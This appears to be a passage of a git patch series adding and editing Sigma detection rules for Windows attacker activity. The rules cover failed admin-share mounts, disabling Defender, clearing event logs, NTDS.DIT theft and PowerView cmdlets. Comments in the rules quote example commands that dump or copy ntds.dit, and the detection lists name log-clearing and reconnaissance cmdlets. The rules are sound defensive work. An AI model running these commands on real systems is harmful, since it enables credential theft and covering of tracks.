From 3a020ce4997d0b1e05fae771ad215632d47071ff Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 31 Aug 2022 09:57:09 +0200 Subject: [PATCH 01/96] added "failed admin share mount" rule --- .../win_susp_failed_admin_share_mount.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml new file mode 100644 index 000000000..6d6470981 --- /dev/null +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -0,0 +1,28 @@ +title: Repeated failed mounting of administrative share +id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb +description: Detects failed (outgoing) attempts to mount an administrative share +author: Fabian Franz +status: experimental +level: medium +references: + - https://twitter.com/moti_b/status/1032645458634653697 + - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +date: 2022/08/30 +modified: 2022/08/30 +logsource: + product: windows + service: smbclient-security +detection: + selection: + EventID: 31010 + ShareName|endswith: '$' + condition: + - selection | count() > 10 +fields: + - ShareName +falsepositives: + - Legitimate administrative activity + - Faulty scripts +tags: + - attack.t1021.002 + - attack.lateral_movement \ No newline at end of file From df2ef5a2ee7c2a35d4cb93c45efd8f46a4bf8533 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 31 Aug 2022 09:59:29 +0200 Subject: [PATCH 02/96] added missing newline --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 6d6470981..2fbc5497e 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -25,4 +25,4 @@ falsepositives: - Faulty scripts tags: - attack.t1021.002 - - attack.lateral_movement \ No newline at end of file + - attack.lateral_movement From ab9e15f4563b899953b6b7ce628714ef00a2cfa4 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Thu, 1 Sep 2022 17:05:32 +0200 Subject: [PATCH 03/96] fix title --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 2fbc5497e..d18cc79b7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,6 +1,6 @@ -title: Repeated failed mounting of administrative share +title: Failed Mounting of Administrative Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental level: medium From 3d9d90f43efc41692047e3ca0ba527f87c78b1f1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 2 Sep 2022 17:24:28 +0200 Subject: [PATCH 04/96] Update win_susp_failed_admin_share_mount.yml --- .../smbclient/win_susp_failed_admin_share_mount.yml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index d18cc79b7..9ff0745f6 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,12 +1,14 @@ -title: Failed Mounting of Administrative Share +title: Multiple Failed Mount Attempts of Admin Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental -level: medium references: - https://twitter.com/moti_b/status/1032645458634653697 - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +tags: + - attack.t1021.002 + - attack.lateral_movement date: 2022/08/30 modified: 2022/08/30 logsource: @@ -16,13 +18,10 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + condition: selection | count() > 10 fields: - ShareName falsepositives: - Legitimate administrative activity - Faulty scripts -tags: - - attack.t1021.002 - - attack.lateral_movement +level: medium From a8eb1ba9723ff94c8cd4bf7545ce393d24bc06af Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 7 Sep 2022 16:52:09 +0200 Subject: [PATCH 05/96] rename rule --- ...share_mount.yml => win_susp_failed_hidden_share_mount.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/windows/builtin/smbclient/{win_susp_failed_admin_share_mount.yml => win_susp_failed_hidden_share_mount.yml} (91%) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml similarity index 91% rename from rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml rename to rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index d18cc79b7..5b3c831e7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -1,6 +1,6 @@ -title: Failed Mounting of Administrative Share +title: Failed Mounting of Hidden Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects repeated failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an hidden share author: Fabian Franz status: experimental level: medium From 860c45a0380c0814f292831996864b10d36fc6bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 9 Sep 2022 17:07:45 +0200 Subject: [PATCH 06/96] added time frame --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index 1089f8c9c..ab736de4d 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,8 +16,8 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + timeframe: 10m + condition: selection | count() > 10 fields: - ShareName falsepositives: From 486fdabe340bd344900de3a36d1e9cd102f5a777 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:15:36 +0200 Subject: [PATCH 07/96] Add posh_ps_disable_windowsoptionalfeature --- ...posh_ps_disable_windowsoptionalfeature.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml new file mode 100644 index 000000000..601f6b71f --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -0,0 +1,35 @@ +title: Disable-WindowsOptionalFeature Command PowerShell +id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 +status: experimental +author: frack113 +date: 2021/09/10 +description: | + Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md + - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Disable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any important windows features + ScriptBlockText|contains: + - 'Windows-Defender-Gui' + - 'Windows-Defender-Features' + - 'Windows-Defender' + - 'Windows-Defender-ApplicationGuard' + condition: all of selection* +falsepositives: + - Unknown +level: high From 5996fbf4c9b4d5502272780d558ade92eb4e7828 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:23:58 +0200 Subject: [PATCH 08/96] Fix tag --- .../posh_ps_disable_windowsoptionalfeature.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 601f6b71f..0bee0b729 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -2,7 +2,7 @@ title: Disable-WindowsOptionalFeature Command PowerShell id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 status: experimental author: frack113 -date: 2021/09/10 +date: 2022/09/10 description: | Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images @@ -10,8 +10,8 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps tags: - - attack.collection - - attack.t1119 + - attack.defense_evasion + - attack.t1562.001 logsource: product: windows category: ps_script From a5fe2857764fbb3287e98cadb9bc3caf7f6a9090 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 11 Sep 2022 16:28:04 +0200 Subject: [PATCH 09/96] fix: too many FPs during Windows update - User empty --- .../image_load_side_load_from_non_system_location.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index a37434bed..acbbd1f87 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -8,7 +8,7 @@ references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex) date: 2022/08/14 -modified: 2022/08/24 +modified: 2022/09/11 tags: - attack.defense_evasion - attack.persistence @@ -418,9 +418,6 @@ detection: - 'C:\Windows\SoftwareDistribution\' filter_systemp: ImageLoaded|startswith: 'C:\Windows\SystemTemp\' - User|contains: # covers many language settings - - 'AUTHORI' - - 'AUTORI' filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe From 51076b20783ecb833c5ccd217589fa577db4765a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:29:15 +0200 Subject: [PATCH 10/96] Update posh_ps_disable_windowsoptionalfeature.yml --- .../powershell_script/posh_ps_disable_windowsoptionalfeature.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 0bee0b729..df3121e56 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -29,6 +29,7 @@ detection: - 'Windows-Defender-Features' - 'Windows-Defender' - 'Windows-Defender-ApplicationGuard' + #- 'Containers-DisposableClientVM' # Windows Sandbox condition: all of selection* falsepositives: - Unknown From f4da079d1358922856fbbbe1d7511b97c04ad978 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:43:54 +0200 Subject: [PATCH 11/96] Add posh_ps_enable_windowsoptionalfeature --- .../posh_ps_enable_windowsoptionalfeature.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml new file mode 100644 index 000000000..c37b1dd75 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml @@ -0,0 +1,33 @@ +title: Enable-WindowsOptionalFeature Command PowerShell +id: 55c925c1-7195-426b-a136-a9396800e29b +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Enable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any unsecure windows features + ScriptBlockText|contains: + - 'TelnetServer' + - 'Internet-Explorer-Optional-amd64' + - 'TFTP' + - 'SMB1Protocol' + condition: all of selection* +falsepositives: + - Unknown +level: medium From 0bbb679e38cdf553db2829d06cb859fe9b6ce2be Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:29:51 +0200 Subject: [PATCH 12/96] fix: FPs with veam backup shell --- .../proc_creation_win_ntfs_short_name_path_use_cli.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 76b3888e5..6fe080f91 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/12 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '\veam.backup.shell.exe' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. From 5f164ebe1279ce9b38941dc67fb68b686d172e46 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:30:14 +0200 Subject: [PATCH 13/96] style: indentation --- .../proc_creation_win_susp_ntds.yml | 108 +++++++++--------- 1 file changed, 54 insertions(+), 54 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml index 42b539ce4..0775c1450 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml @@ -4,63 +4,63 @@ description: Detects suspicious process patterns used in NTDS.DIT exfiltration status: experimental author: Florian Roth references: - - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - - https://pentestlab.blog/tag/ntds-dit/ - - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 - - https://github.com/zcgonvh/NTDSDumpEx - - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 - - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 + - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration + - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ + - https://pentestlab.blog/tag/ntds-dit/ + - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 + - https://github.com/zcgonvh/NTDSDumpEx + - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 + - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 date: 2022/03/11 tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 logsource: - product: windows - category: process_creation + product: windows + category: process_creation detection: - selection_tool: - # https://github.com/zcgonvh/NTDSDumpEx - - Image|endswith: - - '\NTDSDump.exe' - - '\NTDSDumpEx.exe' - - CommandLine|contains|all: - # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv - - 'ntds.dit' - - 'system.hiv' - - CommandLine|contains: 'NTDSgrab.ps1' - selection_oneliner_1: - # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" - CommandLine|contains|all: - - 'ac i ntds' - - 'create full' - selection_onliner_2: - # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit - CommandLine|contains|all: - - '/c copy ' - - '\windows\ntds\ntds.dit' - selection_powershell: - CommandLine|contains|all: - - 'powershell' - - 'ntds.dit' - set1_selection_ntds_dit: - CommandLine|contains: 'ntds.dit' - set1_selection_image_folder: - - ParentImage|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - - Image|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - condition: 1 of selection* or all of set1* + selection_tool: + # https://github.com/zcgonvh/NTDSDumpEx + - Image|endswith: + - '\NTDSDump.exe' + - '\NTDSDumpEx.exe' + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - 'ntds.dit' + - 'system.hiv' + - CommandLine|contains: 'NTDSgrab.ps1' + selection_oneliner_1: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: + - 'ac i ntds' + - 'create full' + selection_onliner_2: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: + - '/c copy ' + - '\windows\ntds\ntds.dit' + selection_powershell: + CommandLine|contains|all: + - 'powershell' + - 'ntds.dit' + set1_selection_ntds_dit: + CommandLine|contains: 'ntds.dit' + set1_selection_image_folder: + - ParentImage|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + - Image|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + condition: 1 of selection* or all of set1* falsepositives: - - Unknown + - Unknown level: high From 0caeaaa12224700f0f502b9077568b19be893d83 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:32 +0200 Subject: [PATCH 14/96] Update rules --- ..._susp_prog_location_network_connection.yml | 50 +++++++++---------- .../proc_creation_win_susp_eventlog_clear.yml | 17 ++++--- 2 files changed, 34 insertions(+), 33 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 2c87f50da..0df871e90 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml @@ -4,36 +4,36 @@ status: test description: Detects programs with network connections running in suspicious files system locations author: Florian Roth, Tim Shelton references: - - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo + - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo date: 2017/03/19 modified: 2022/05/26 logsource: - category: network_connection - product: windows - definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' + category: network_connection + product: windows + definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' detection: - selection: - - Image|contains: + selection: + - Image|contains: # - '\ProgramData\' # too many false positives, e.g. with Webex for Windows - - '\Users\All Users\' - - '\Users\Default\' - - '\Users\Public\' - - '\Users\Contacts\' - - '\Users\Searches\' - - '\config\systemprofile\' - - '\Windows\Fonts\' - - '\Windows\IME\' - - '\Windows\addins\' - - Image|endswith: - - '\$Recycle.bin' - - Image|startswith: - - 'C:\Perflogs\' - false_positive1: - Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location - condition: selection and not 1 of false_positive* + - '\Users\All Users\' + - '\Users\Default\' + - '\Users\Public\' + - '\Users\Contacts\' + - '\Users\Searches\' + - '\config\systemprofile\' + - '\Windows\Fonts\' + - '\Windows\IME\' + - '\Windows\addins\' + - Image|endswith: + - '\$Recycle.bin' + - Image|startswith: + - 'C:\Perflogs\' + false_positive1: + Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location + condition: selection and not 1 of false_positive* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.command_and_control - - attack.t1105 + - attack.command_and_control + - attack.t1105 diff --git a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml index da3d019ac..322528935 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html date: 2019/09/26 -modified: 2022/07/14 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -15,18 +15,19 @@ detection: selection_wevtutil: Image|endswith: '\wevtutil.exe' CommandLine|contains: - - 'clear-log' # clears specified log - - ' cl ' # short version of 'clear-log' - - 'set-log' # modifies config of specified log. could be uset to set it to a tiny size - - ' sl ' # short version of 'set-log' + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' selection_other_ps: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - - 'Clear-EventLog' - - 'Remove-EventLog' - - 'Limit-EventLog' + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' selection_other_wmic: Image|endswith: '\wmic.exe' CommandLine|contains: ' ClearEventLog ' From 6fa682b619e5751d37b6e75dfe265bfc447c8e16 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:36 +0200 Subject: [PATCH 15/96] Create posh_ps_susp_clear_eventlog.yml --- .../posh_ps_susp_clear_eventlog.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml new file mode 100644 index 000000000..49a838e80 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -0,0 +1,31 @@ +title: Suspicious Eventlog Clear +id: 0f017df3-8f5a-414f-ad6b-24aff1128278 +related: + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs +references: + - https://twitter.com/oroneequalsone/status/1568432028361830402 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md + - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html +status: experimental +author: Nasreddine Bencherchali +date: 2022/09/12 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection: + ScriptBlockText|contains: + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' + condition: selection +falsepositives: + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate +level: medium +tags: + - attack.defense_evasion + - attack.t1070.001 From 8a504bee9ef34b1e1591514006b8e18287844e51 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:49:14 +0200 Subject: [PATCH 16/96] Add %tmp% env variable --- ...osh_ps_powerview_malicious_commandlets.yml | 250 +++++++++--------- ...tsadmin_download_uncommon_targetfolder.yml | 2 + ...eation_win_cmd_redirection_susp_folder.yml | 1 + ...c_creation_win_netsh_fw_add_susp_image.yml | 83 +++--- ...n_win_reg_import_from_suspicious_paths.yml | 2 + .../proc_creation_win_susp_curl_download.yml | 3 +- ...on_win_susp_invoke_webrequest_download.yml | 2 + ...oc_creation_win_susp_mofcomp_execution.yml | 3 +- .../proc_creation_win_susp_recon.yml | 5 +- .../proc_creation_win_susp_sharpview.yml | 14 +- ...ation_win_susp_target_location_shell32.yml | 2 + ...roc_creation_win_susp_wmic_proc_create.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 2 + ...egistry_set_susp_app_paths_persistence.yml | 2 + .../registry_set_susp_run_key_img_folder.yml | 16 +- 15 files changed, 207 insertions(+), 183 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 332337938..12701d630 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml @@ -18,131 +18,131 @@ logsource: category: ps_script definition: Script Block Logging must be enabled detection: - selection: - ScriptBlockText|contains: - - Export-PowerViewCSV - - Get-IPAddress - - Resolve-IPAddress - - Convert-NameToSid - - ConvertTo-SID - - Convert-ADName - - ConvertFrom-UACValue - - Add-RemoteConnection - - Remove-RemoteConnection - - Invoke-UserImpersonation - - Invoke-RevertToSelf - - Request-SPNTicket - - Get-DomainSPNTicket - - Invoke-Kerberoast - - Get-PathAcl - - Get-DNSZone - - Get-DomainDNSZone - - Get-DNSRecord - - Get-DomainDNSRecord - - Get-NetDomain - - Get-Domain - - Get-NetDomainController - - Get-DomainController - - Get-NetForest - - Get-Forest - - Get-NetForestDomain - - Get-ForestDomain - - Get-NetForestCatalog - - Get-ForestGlobalCatalog - - Find-DomainObjectPropertyOutlier - - Get-NetUser - - Get-DomainUser - - New-DomainUser - - Set-DomainUserPassword - - Get-UserEvent - - Get-DomainUserEvent - - Get-NetComputer - - Get-DomainComputer - - Get-ADObject - - Get-DomainObject - - Set-ADObject - - Set-DomainObject - - Get-ObjectAcl - - Get-DomainObjectAcl - - Add-ObjectAcl - - Add-DomainObjectAcl - - Invoke-ACLScanner - - Find-InterestingDomainAcl - - Get-NetOU - - Get-DomainOU - - Get-NetSite - - Get-DomainSite - - Get-NetSubnet - - Get-DomainSubnet - - Get-DomainSID - - Get-NetGroup - - Get-DomainGroup - - New-DomainGroup - - Find-ManagedSecurityGroups - - Get-DomainManagedSecurityGroup - - Get-NetGroupMember - - Get-DomainGroupMember - - Add-DomainGroupMember - - Get-NetFileServer - - Get-DomainFileServer - - Get-DFSshare - - Get-DomainDFSShare - - Get-NetGPO - - Get-DomainGPO - - Get-NetGPOGroup - - Get-DomainGPOLocalGroup - - Find-GPOLocation - - Get-DomainGPOUserLocalGroupMapping - - Find-GPOComputerAdmin - - Get-DomainGPOComputerLocalGroupMapping - - Get-DomainPolicy - - Get-NetLocalGroup - - Get-NetLocalGroupMember - - Get-NetShare - - Get-NetLoggedon - - Get-NetSession - - Get-LoggedOnLocal - - Get-RegLoggedOn - - Get-NetRDPSession - - Invoke-CheckLocalAdminAccess - - Test-AdminAccess - - Get-SiteName - - Get-NetComputerSiteName - - Get-Proxy - - Get-WMIRegProxy - - Get-LastLoggedOn - - Get-WMIRegLastLoggedOn - - Get-CachedRDPConnection - - Get-WMIRegCachedRDPConnection - - Get-RegistryMountedDrive - - Get-WMIRegMountedDrive - - Get-NetProcess - - 